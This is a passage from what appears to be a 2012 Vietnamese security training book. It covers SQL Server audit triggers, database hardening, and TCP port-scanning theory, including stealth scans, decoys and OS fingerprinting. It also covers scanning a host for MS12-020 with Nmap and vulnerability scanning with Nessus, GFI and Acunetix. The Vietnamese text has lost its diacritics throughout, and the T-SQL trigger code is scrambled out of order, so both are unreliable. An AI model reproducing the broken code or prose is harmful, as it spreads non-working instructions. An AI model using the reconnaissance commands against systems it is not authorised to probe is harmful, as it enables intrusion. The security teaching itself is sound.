quyt ny s gii quyt c vn delete, tuy nhin n vp phi vn v rng buc d liu. Hy tng tng ti c mt bng username ti s t chc nh sau: ID-UserName-Password. v ct isDeleted. V bn hiu chuyn g trong ny USERNAME phi l duy nht trong h thng. N ch c ang k li khi mt ngi hy n i hoc cha tn ti.

Page | 201 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

By gi ti xa username =xyz, ngha l username =xyz l isDeleted, sau ti tip tc insert username l xyz. Lc ny vn ti phi rng buc ton vn trn database l nm trn ct isDeleted, Constraint ca ti phi rng buc username v isDeleted l duy nht, tuyt, nhng ring trong chuyn ny th l khng n, bn phi tnh ti chuyn to mt constrain cho mt ct khng tham gia vo bussiness ca h thng, iu ny l ra nn trnh. Mt khc, chuyn g s xy ra nu ti insert username=zyz, sau xa, ri to li, ri li xa. Vn by gi bn phi lun kim tra trc khi insert d liu, c bao gi bn t hi, vy constraint trong database sinh ra lm g khng?? To mt bn sao database: nu lm qua Oracle bn u bit c mt loi audit table m oracle h tr qun l vic insert, delete , update. Khng nht thit phi Oracle, trong database khc bn cng c th d dng ci t chc nng ny, n gin nh sau: To mt Database log y ht database gc, mi bng thm mt ct l action cho update, delete (insert l ty chn ca bn) To trigger cho tng bng, khi c thay i trn database gc, n s insert vo bng log vi s kin tng ng. Cch gii quyt ny theo ti l rt tt: th nht n khng lm nng n database gc ca chng ta, khi d liu b xa i, n s chuyn sang database log v khng lm phnh to database gc v d hiu nh th khi truy vn database gc s cho tc tt hn v t d liu hn. Vn ca n l kh qun l, bn phi vit chng trnh qun l cho tng bng, cc y ch nh.

Page | 202 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

S dng mt bng duy nht lm bng Audit.

on script to bng ny nh sau: CREATE TABLE (Type TableName PK FieldName OldValue NewValue UpdateDate UserName VARCHAR(128)) Audit CHAR(1), VARCHAR(128), VARCHAR(1000), VARCHAR(128), VARCHAR(1000), VARCHAR(1000), datetime,

Vi cch tip cn ny, ti s gii thch cc field nh sau: AuditID :l mt id t tng. Type: mt action n c th l D (Delete) I (Insert) U (Update). TableName : action xy ra trn bng no. PrimaryKeyField : kha chnh ca dng b xa (vi bng 1 kha chnh -Theo Agile, nu bn mong mun khc i, hy customize code) PrimaryKeyValue: gi tr ca ct cha kha chnh. FieldName : Ct b xy ra action. OldValue : Gi tr c trc khi b thay i. NewValue : Gi tr mi sau khi b thay i. UpdateDate : Ngy gi xy ra action. UserName : ngi dng (Ti s s dng user ca h thng, hy s dng username trn mt table khc nh bn mun)

Page | 203 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nhn vo bng kt qu chc bn hnh dung c vn .

-Set up -Firstly, we create -- There will only need to be one of these in a database

the the audit

tables table.

IF NOT EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[Audit]') AND OBJECTPROPERTY(id, N'IsUserTable') = 1) CREATE TABLE Audit (Type CHAR(1), TableName VARCHAR(128), PK VARCHAR(1000), FieldName VARCHAR(128), OldValue VARCHAR(1000), NewValue VARCHAR(1000), UpdateDate datetime, UserName VARCHAR(128)) GO -now we will illustrate -- by creating a dummy test table called TrigTest. the use of this tool

IF EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[trigtest]') AND OBJECTPROPERTY(id, N'IsUserTable') = 1) DROP TABLE [dbo].[trigtest] GO CREATE TABLE trigtest (i INT NOT NULL, j INT NOT NULL, s VARCHAR(10), t VARCHAR(10)) GO

Page | 204 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

--note that for this system to work there must be a primary key to the table --but then a table without a primary key isn't really a table is it? ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j) GO --and now create the -table you want to monitor CREATE AS DECLARE TRIGGER trigger itself. This has to be created for every

tr_trigtest

ON

trigtest

FOR

INSERT,

UPDATE,

DELETE

@bit @field @maxfield @char @fieldname @TableName @PKCols @sql @UpdateDate @UserName @Type @PKSelect VARCHAR(1000) @TableName to

INT INT INT INT VARCHAR(128) VARCHAR(128) VARCHAR(1000)

, , , , , , , VARCHAR(2000), VARCHAR(21) , VARCHAR(128) , CHAR(1) ,

--You will need to change SELECT @TableName = 'trigtest' -SELECT

match

the

table

to

be

audited

date and @UserName = SYSTEM_USER @UpdateDate = CONVERT(VARCHAR(8), GETDATE(), + ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)

user , 112)

-IF

EXISTS (SELECT * IF EXISTS (SELECT SELECT @Type @Type

FROM FROM = =

SELECT ELSE SELECT @Type = 'D' -get SELECT * INTO SELECT * INTO #del FROM deleted -Get primary SELECT @PKCols = list

Action inserted) deleted) 'U' ELSE 'I'

of #ins FROM

columns inserted

key columns for COALESCE(@PKCols +

full '

outer and', '

join on')

Page | 205 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

+ FROM

' i.' + c.COLUMN_NAME + ' = d.' + INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk ,

c.COLUMN_NAME

AND -SELECT

INFORMATION_SCHEMA.KEY_COLUMN_USAGE c WHERE pk.TABLE_NAME = @TableName AND CONSTRAINT_TYPE = 'PRIMARY KEY' AND c.TABLE_NAME = pk.TABLE_NAME c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME Get primary @PKSelect key

select for insert = COALESCE(@PKSelect+'+','') + '''<' + COLUMN_NAME + '=''+convert(varchar(100), coalesce(i.' + COLUMN_NAME +',d.' + COLUMN_NAME + '))+''>''' FROM INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk , INFORMATION_SCHEMA.KEY_COLUMN_USAGE c WHERE pk.TABLE_NAME = @TableName AND CONSTRAINT_TYPE = 'PRIMARY KEY' AND c.TABLE_NAME = pk.TABLE_NAME AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME IF BEGIN RAISERROR('no END SELECT = 0, @maxfield = MAX(ORDINAL_POSITION) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName WHILE @field < @maxfield BEGIN SELECT @field = MIN(ORDINAL_POSITION) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION > @field SELECT @bit = (@field 1 )% 8 + 1 SELECT @bit = POWER(2,@bit 1) SELECT @char = ((@field 1) / 8) + 1 IF SUBSTRING(COLUMNS_UPDATED(),@char, 1) & @bit > 0 OR @Type IN ('I','D') BEGIN SELECT @fieldname = COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName AND ORDINAL_POSITION = @field SELECT @sql = ' insert Audit ( Type, Page | 206 Copyright by Tocbatdat @field @PKCols PK on table %s', IS 16, -1, NULL @TableName) RETURN

[TL: o to v An ton thng tin cho ABC

6, 2012

TableName, PK, FieldName, OldValue, NewValue, UpdateDate, UserName) select ''' + @Type + ''',''' + @TableName + ''',' + @PKSelect + ',''' + @fieldname + '''' + ',convert(varchar(1000),d.' + @fieldname + ')' + ',convert(varchar(1000),i.' + @fieldname + ')' + ',''' + @UpdateDate + '''' + ',''' + @UserName + '''' + ' from #ins i full outer join #del d' + @PKCols + ' where i.' + @fieldname + ' <> d.' + @fieldname + ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)' + ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)' EXEC (@sql) END END GO ------------------------------------------------------on m trn s lm vic hon ho, n s i vo s ca h thng v tm ra tt c nhng bng c trong schema, sau to tng trigger theo mt template nht nh- Hy gii hn table hay column bng cch customize li code ny. Lu : on m ny thc hin trn Microsoft SQL Server v s dng trigger hy sa i cho ph hp trn nhng database khc. iu ny khng th thc hin trn CSDL khng h tr trigger. Li ch : tip cn thng qua ch mt table, iu ny mang n s thun tin v d dng khi qun tr, nu h thng tip tc sinh si ra cc bng, khng phi l vn . Bt li : Mt cht v vn Perfomance, vi cc Database trung bnh v nh, vic audit l bnh thng, tuy nhin nu database ln khi s dng nhiu cu Insert v Delete s to ra nhng d liu khng l trn tng dng (v n lu 1 field trn mt dng audit ). Trong mi loi database d ln hay nh, nu ch s dng tracking Update action, y l mt cch tip cn tt nht. Vi Delete, hy customize li m s dng ti thiu trng cn phi tracking hoc c th p dng phng php logging th 2 da trn on m ny.

Page | 207 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

3. Phng thc an ton c s d liu Cu trc bo mt c s Cc doanh nghip hin nay dng nh qu ch trng vo tng thnh phn bo mt m qun i bc tranh ton cnh: Nu nh khng c mt h thng t chc bo mt c s, bt k chnh sch bo mt no cng u tht bi. Ngi qun tr h thng thng hay qun l bo mt theo mun ring ca mnh, khng c hoc ch mt t gim st t ngi qun l cao hn. iu ny lm gia tng cc cu hi: Ai m bo rng ngi qun tr h thng theo ng cc hng dn bo mt? Mt t chc m bo tt c qun tr vin h thng cp nht bn v li mi nht nh th no? Mt t chc ly g m bo bn v li mi nht c kim tra chc chn chng khng tr thnh nguyn nhn gy ra hng hc cho h thng? Ai l ngi kim chng bo mt cho ton b tp on hay tng cn g ty?

mt

chc

bo

mt

mng

hiu

qu

rng

D c mt cu trc ph hp, bn cng vn gp phi s ln xn trong nhng vn quan trng nh bo mt. Cc vn ln xn ny gy ra khng t bin ng ln, chng hn: Jim ti vn phng B bin ng cp nht tt c bn v li nhng anh ta c mi lin kt khng an ton vi Bill b bin ty. Anh ny tht bi khi thit lp cu hnh ph hp cho tng la. V ch cn nh th l cho mt cuc tng tn cng ph hoi. Trc nhng trng hp nh th, bn cn xem xt li ton b khi thit lp cu trc bo mt c s. By gi, sau khi c t chc bo mt c s cho h thng, chng ta s bt u xem xt cc vn k thut ca bo mt c s d liu. L hng c s d liu (mun mt chin tranh bo mt!) Bo mt c s d liu v c bn c th b tn cng theo trn cc lnh vc sau:

Page | 208 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Cc dch v bo mt (Server Security) Cc kt ni c s d liu (Database Connection) iu khin truy cp bng (Table Access Control) Gii hn truy cp c s d liu (Restricting Database Access) Cc dch v bo mt (Server Security) Server Security l chng trnh t gii hn quyn truy cp thc vo dch v c s d liu. y l kha cnh quan trng nht ca bo mt, bn nn lp k hoch cn thn cho n. tng c bn ca n l: Bn khng th truy cp vo ci m bn khng th thy. y khng phi l mt web server v cng khng nn l mt kt ni nc danh. Khi cn cung cp thng tin cho web ng, c s d liu ca bn khng nn t cng mt my vi web server. iu khng ch v mc ch bo mt m cn tt cho c qu trnh thc thi. Nu c s d liu l p ng cho web server, nn cu hnh ch cho php kt ni vi web server .

Truy cp i ch IP tin cy, gii hn dch v c s d liu ch trong cc yu cu thng tin tr li t IP web server bit a ch IP tin cy Mi mt server ch nn cu hnh cho php lin h vi cc i ch IP tin cy. Tng t nh nh bn, bn khng cho php con mnh ni chuyn vi ngi l, th y bn cng nn bit chnh xc ai c quyn ni chuyn vi database server. Nu im tr cui l mt web server th ch nn cho php i ch ca web server c quyn truy cp database server. Nu database server cung cp thng tin cho ng dng chnh chy trn mng ni b th nn gii hn i ch ch trong mng ni b. Khng nn trng thi yu ca cc web database trn cng mt server vi thng tin c s d liu ni b. Cc kt ni c s d liu (Database Connection) Cc ng dng ng (Dynamic Application) hin nay ang tr thnh nguyn nhn khin nhiu ngi cp nht c s d liu trc tip m khng qua thm nh. Nu bn cho php ngi dng cp nht c s d liu qua trang web, hy m bo rng bn cp nht l an ton. Chng hn vi m Page | 209 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

ngun SQL, mt ngi dng thng thng khng bao gi c nhp d liu vo nu d liu cha tng c xem xt. Nu cn s dng kt ni ODBC, hy m bo rng ch c mt s ngi dng c quyn truy cp file chia s. C bao gi mi nhn vin trong cng ty ca bn c quyn c tt c cha kho ca mi phng cng ty? V th ng bao gi cho php cc ti khon ngi dng s dng mi kt ni v ngun d liu trn server. iu khin truy cp bng (Table Access Control) iu khin truy cp bng l mt trong cc dng thc hay b b st nht bo mt c s d liu. V rt kh k tha v p dng n. S dng mt cch thch hp iu khin truy cp bng i hi phi c s hp tc ca c qun tr vin h thng v ngi pht trin c s d liu. V tt c chng ta u bit rng hp tc l mt t l trong cng nghip IT. Nhiu ngi dng s quy ti c quyn truy cp l do ngi qun tr h thng c s d liu mc public. Hoc nu bng ch c s dng cho mc h thng th ti sao n li c cc quyn truy cp khc bn cnh quyn admin. ng tic l cu trc bng, c s d liu quan h ph hp v vn pht trin khng nm trong phm vi ca bi ny. C th chng ta s bn k hn trong bi sau. Gii hn truy cp c s d liu (Restricting Database Access) y l mc cui cng trong bi tng quan v bo mt c s d liu chng ta ang xem xt. Vn ch yu trong mc ny l truy cp mng h thng, trong tp trung v c s d liu internet. Hu ht ch nhm ca cc cuc tn cng hin nay u l database c s mng, tt c ng dng s dng web u c cng cho cc k tn cng nghe ngng. Ti phm mng by gi thng ch yu s dng hnh thc n gin port scan (qut cng) tm cc cng m t mc nh cho h thng c s d liu ph bin. Ni l mc nh v bn c th thay i cc cng thnh dch v nghe, l mt cch hay trnh cc cuc tn cng. u tin chng s c gng d xem liu mt my c a ch c th no khng. Chng s dng cu lnh ping, n gin bng cch m ca s lnh command v g t kho pingvo, chng hn: C:\ ping 127.0.0.1 hay root@localhost: ~$: ping 127.0.0.1 Phn tr li c th dng: Pinging 127.0.0.1 with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Page | 210 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms V d v lnh ping

Ti phm mng ngy nay bit rt r v cu tr li ca h thng cc i ch ny. Bin php ngn chn u tin l v hiu ho cc gi ICMP. N cng c th ngn chn phn tr li t yu cu ping. C nhiu cch ngn chn truy cp m Internet. Mi h thng c s d liu u c mt tp thnh phn ring duy nht cng nh h iu hnh. y ch xin a ra mt vi phng thc: a ch IP tin cy: cc dch v UNIX c cu hnh tr li ch cc lnh ping trong danh sch host tin cy. Trong UNIX, thc hin hon chnh vic ny bng cch cu hnh file rhosts, gii hn truy cp server trong danh sch ngi dng c th. V hiu ho ti khon server: Nu bn ang tm ngng mt server ID sau 3 ln sai mt khu, bn tm hon c cuc tn cng. Nu khng th k tn cng c th chy chng trnh pht sinh hng triu mt khu cho ti khi no n on ng ID v mt khu thch hp ca ngi dng mi thi. Cc chc nng c bit: bn c th s dng mt s sn phm nh RealSecure by ISS. N s gi mt cnh bo khi c dch v bn ngoi ang c gng xm phm bo mt h thng ca bn. C s d liu Oracle c rt nhiu phng thc kim nh: Bo mt Kerberos: y l chic v ph bin, gip trnh phi s dng h thng thm nh c s. C s d liu ring o (VPD): Cng ngh VPD c th gii hn quyn truy cp bng cch chn mt s hng ca ct. Bo mt grant-execute (cp pht thc thi): c quyn thc thi chng trnh con c th c kt hp cht ch i vi ngi dng. Khi ngi dng thc thi chng trnh con, h c cp pht quyn truy cp c s d liu, nhng ch nm trong phm vi chng trnh con. Cc dch v thm nh: Cc dch v thm nh bo mt cung cp nhn dng xc nh trc ngi dng ngoi. Bo mt truy cp cng: Tt c ng dng Oracle u c nghe trc tip ti mt cng c th trn server. Ging nh bt k dch v HTTP chun khc, Oracle Web Listener c th c cu hnh gii hn quyn truy cp.

Page | 211 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

VI.

CC CNG C NH GI V PHN TCH MNG 1. K nng Scan Open Port Trong bi vit ny ti trnh by vi cc bn cc nguyn tc Scan Port c bn trn h thng, nhng k thut scan t chng ta bit trn mt h thng ang s dng nhng Port no. T nhng khi nim v Scan ti cng trnh by vi cc bn gii php ngn cm Scan trn h thng. Ni dung trong bi vit gm: Nguyn tc truyn thng tin TCP/IP Cc Nguyn tc v Phng thc Scan Port S dng phn mm Nmap a. Nguyn tc truyn thng tin TCP/IP a. 1. Cu to gi tin TCP

Trong bi vit ny ti ch ch trng ti cc thit lp Flag trong gi tin TCP nhm mc ch s dng Scan Port: - Thng s SYN yu cu kt ni gia hai my tnh - Thng s ACK tr li kt ni gia hai my c th bt u c thc hin

Page | 212 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

- Thng s FIN kt thc qu trnh kt ni gia hai my - Thng s RST t Server ni cho Client bit rng giao tip ny b cm (khng th s dng) - Thng s PSH s dng kt hp vi thng s URG - Thng s URG s dng thit lp u tin cho gi tin ny. Tht ra ton b cc thng s ny trong gi tin n ch th hin l 1 hoc 0 nu l 0 th gi tin TCP khng thit lp thng s ny, nu l 1 th thng s no c thc hin n s ln lt trong 8 bits trong phn Flag. a.2. 3 bc bt u mt kt ni TCP

+ Bc I: Client bn n Server mt gi tin SYN + Bc II: Server tr li ti Client mt gi tin SYN/ACK + Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v qu trnh trao i thng tin gia hai my bt u. a.3 4 Bc kt thc mt kt ni TCP

+ Bc I: Client gi n Server mt gi tin FIN ACK + Bc II: Server gi li cho Client mt gi tin ACK + Bc III: Server li gi cho Client mt gi FIN ACK

Page | 213 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v Client c thc hin. b. Nguyn tc Scan Port trn mt h thng. b. 1. TCP Scan Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1 65535 port. Khng mt hacker no li scan ton b cc port trn h thng, chng ch scan nhng port hay s dng nht thng ch s dng scan t port 1 ti port 1024 m thi. Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt kt ni gia hai my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca TCP ti c th Scan Port no m trn h thng bng nhng phng thc sau y: - SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server nu server gi v gi SYN/ACK th Client bit Port trn Server c m. Nu Server gi v cho Cl ient gi RST/SYN ti bit port trn Server ng. - FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s port nht nh gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit Server m port , nu Server gi v gi RST th Client bit Server ng port . - NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan m khng cha thng s Flag no, nu Server gi li gi RST th ti bit port trn Server b ng. - XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan cha nhiu thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit port trn Server b ng. - TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu cu kt ni thc t ti cc port c th trn server. Nu server tr v gi SYN/ACK th Client bit port m, nu Server gi v gi RST/ACK Client bit port trn Server b ng. - ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn Server. Client c gng kt ni ti Server bng gi ICMP nu nhn c gi tin l Host Unreachable th client s hiu port trn server b lc. C vi dng Scan cho cc dch v in hnh d b tn cng nh: Page | 214 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng. - Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt s port nht nh. - FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay khng - IDLE y l dng Passive Scan, sniffer v a ra kt lun my tnh m port no. Phng thc ny chnh xc nhng i khi khng y bi c nhng port trn my tnh m nhng khng c giao tip th phng thc ny cng khng scan c b.2. UDP Scan. Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c truyn ti ch. Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu nhanh vi cc gi tin nh. Vi qu trnh thc hin truyn tin bng TCP k tn cng d dng Scan c h thng ang m nhng port no da trn cc thng s Flag trn gi TCP. Cu to gi UDP

Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng cc phng thc Scan port ca TCP s dng cho UDP c. Tht khng may hu ht h thng u cho php gi ICMP. Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi mt gi ICMP type 3 code 3 port vi ni dung l unreachable v Client. Khi thc hin UDP Scan bn hy chun b tinh thn nhn c cc kt qu khng c tin cy cao.

Page | 215 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Scan Port vi Nmap. Nmap l mt tool scan port rt mnh v ni danh t lu c gii hacker tin dng. N h tr ton b cc phng thc scan port, ngoi ra n cn h tr cc phng thc scan hostname, service chy trn h thng . Nmap hin gi c c giao din ho v giao din command line cho ngi dng, chy trn c mi trng .NIX v Windows. Phn mm nmap min ph cc bn download ti a ch: http://nmap.org/download.html Di y l cch s dng Nmap scan C:\nmap-3.93>nmap -h Nmap 3.93 Usage: nmap [Scan Type(s)] [Options] <host or net list> Some Common Scan Types ('*' options require root privileges) * -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sV Version scan probes open ports determining service and app names/versions -sR/-I RPC/Identd scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p <range> ports to scan. Example range: '1-1024,1080,6666,31337' -F Only scans ports listed in nmap-services Page | 216 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

-v Verbose. Its use is recommended Use twice for greater effect. -P0 Don't ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -6 scans via IPv6 rather than IPv4 -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve] -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile> -iL <inputfile> Get targets from file; Use '-' for stdin * -S <your_IP>/-e <devicename> Specify source address or network interface --interactive Go into interactive mode (then press h for help) --win_help Windows-specific features Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*' SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

Cc dng Scan nmap h tr. Nmap sT: trong ch s l Scan, cn ch T l dng TCP scan Nmap sU: l s dng UDP Scan Nmap sP: s dng Ping scan Nmap sF: s dng FIN Scan Nmap sX: s dng phng thc XMAS Scan

Page | 217 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nmap sN: s dng phng thc NULL Scan Nmap sV: s dng Scan tn cc ng dng v version ca n Nmap SR /I RPC s dng scan RPC Nmap sT p1-5000 sV O T5 192.168.0.211 y l cu lnh s dng phng thc TCP Scan t Port 1 5000 cho php Fingerprint Services v OS, T5 l scan nhanh n my tnh 192.168.168.0.211. Cc option cao cp kt hp vi cc dng Scan trong Nmap. - O: s dng bit h iu hnh chy trn my ch v nh ta dng Nmap s dng phng thc scan l XMAS Scan v on bit h iu hnh ca: www.tocbatdat.net ta dng cu lnh: nmap sX o www.tocbatdat.net. - P: gii port s dng scan - F: Ch nhng port trong danh sch scan ca Nmap - V: S dng Scan hai ln nhm tng tin cy v hiu qu ca phng thc scan no ta s dng. - P0: khng s dng ping Scan nhm mc ch gim thiu cc qu trnh qut ngn chn scan trn cc trang web hay my ch. V nh ti mun Scan trang web www.tocbatdat.net bng phng thc UDP Scan s port ti s dng l t 1 ti 1024 v s dng hai ln nng cao hiu qu, khi scan s khng ping ti trang ny: Nmap sU P 1-1024 V P0 Ngoi ra nmap cn h tr tnh nng scan n nhm trnh nhng qu trnh qut trn server nh s dng: -Ddecoy_host1, decoy2 s n qu trnh Scan. -6: Scan IPv6 Page | 218 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh dng file khc nhau. 2. Scan l hng bo mt trn OS a. S dng Nmap Scan l hng bo mt ca OS Nmap c s dng tp Signature scan l hng bo mt l Nmap Script Engine. Mi file Nmap Script Engine (.nse) s scan c mt loi l hng bo mt. Di y ti trnh by cch Scan l hng bo mt MS12-020, l hng cho php tn cng DoS lm treo h thng my tnh Windows 7, 2008, Vista, XP, 2003. Step 1: access Google search query "search ms12-020 by nmap" Step 2: download file Nmap Script Engine (.nse) step 3: Install nmap 6 step 4: Scan s dng nmap vi cu lnh (File nse trong E th mc tocbatdat). nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan Step 5: Khi Nmap bo nh sau th c l hng bo mt (My tnh a ch IP 192.168.0.77 c l hng bo mt MS12-020)

Page | 219 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tng t nh vy chng ta c th s dng Nmap Script Engine scan cc l hng bo mt khc. b. S dng Nessus Scan l hng bo mt ca OS Nessus l cng c Scan min ph rt hiu qu, cho php pht hin cc l hng bo mt ca hu ht cc OS, Device, Application. Download load Nessus ti ng dn: http://www.nessus.org/products/nessus/select-your-operating-system Page | 220 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ci t:

Sau khi ci t hon tt cho php login vo giao din consoles:

Page | 221 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nhn nt here tip tc:

Nhn Get Started, t User v Password admin qun tr Nessus

Page | 222 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nhn Next tip tc, nu cha c Activation Code th nhn vo phn register:

Nhn Next tip ra giao din download plug-in cho Nessus Page | 223 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Qu trnh download v ci t cc Plug-In

Sau khi ci t hon tt ra ca s cho php ng nhp

Page | 224 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ca s qun tr sau khi ng nhp vo Nessus:

Page | 225 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Scan trc tin chng ta cu hnh thit lp Policy cho qu trnh Scan Nhn vo tab Policy. Mc nh h thng c sn mt s Policy nh Web App Test, PCI. Nhn Policy Internal Network Scan chn Edit, chng ta cu hnh la chn scan my ch Windows Server. Thit lp cc thng s Scan.

La chn ch cn Scan l my tinh 192.168.0.194 v Policy s dng l Internal Policy (chnh sch chng ta va chnh sa).

Page | 226 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Sau khi thit lp Policy hon tt sang Tab Scan add host cn Scan vo: Chn Lauch Scan Kt qu sau khi Scan hon tt: h thng s a ra Report v s lng l hng bo mt, Open Port, OS, Service, tn l hng bo mt v hng gii quyt.

Page | 227 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nessus thc s l mt cng c Scan mnh v hiu qu c bit min ph i vi ngi dng c nhn. Nessus s dng giao din vWeb thun tin cho ngi qun tr t xa, ngoi ra Nessus cn cho php t lch Scan. Khi cn gii php Scan l hng bo mt hiu qu v min ph th Nessus l la chn s 1. c. S dng GFI Scan l hng bo mt ca OS GFI l b cng c cho php Scan, qun l v v l hng bo mt cho h thng Windows. L mt cng c thng mi nn GFI kh mnh v ph bin i vi cc gii php ny.

Page | 228 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Sau khi ci t hon tt s dng GFI cng tng t nh Nessus

Page | 229 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

La chn Option Full Scan

Nhn Scan v xem kt qu,

Page | 230 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

GFI c mt im kh mnh l cho php v l hng bo mt trn my Scan nu c quyn qun tr. 3. Scan l hng bo mt trn Web Web l dch v ph bin nht hin nay, rt nhiu ng dng s dng nn tng vWeb, nhng i km vi iu l c rt nhiu l hng bo mt trn dch v ny. L hng trn vWeb c th chia ra: L hng trn OS L hng trn vWeb Service (IIS, Apache) L hng trn Web Application (SQL Injection, XSS,) y l l hng ph bin v kh pht hin ra nu khng c cc cng c Scan.

Page | 231 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

a. S dng Acunetix scan l hng bo mt trn Web Acunetix l cng c Scan nhanh, hiu qu i vi l hng trn dch v Web hin nay. Ci t Acunetix Scan

Sau khi ci t thnh cng tin hnh Scan mt website no

Page | 232 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Kt qu Scan mt trang web:

Page | 233 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

b. Lab S dng IBM App Scan Scan l hng bo mt trn Web 4. K thut phn tch gi tin v nghe nn trn mng. a. Bn cht ca Sniffer Sniffer l qu trnh chuyn tn hiu in sang tn hiu s ri Decode chng ln cc Layer cao hn c c cc thng tin cn thit. Trn Windows c th vin WinPcap lm nhim v ny Trn Linux c th vin LibPcap lm nhim v ny Tt c cc cng c u phi s dng WinPcap hoc LibPcap c th Decode c gi tin t Layer 2 Layer 7.

Page | 234 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

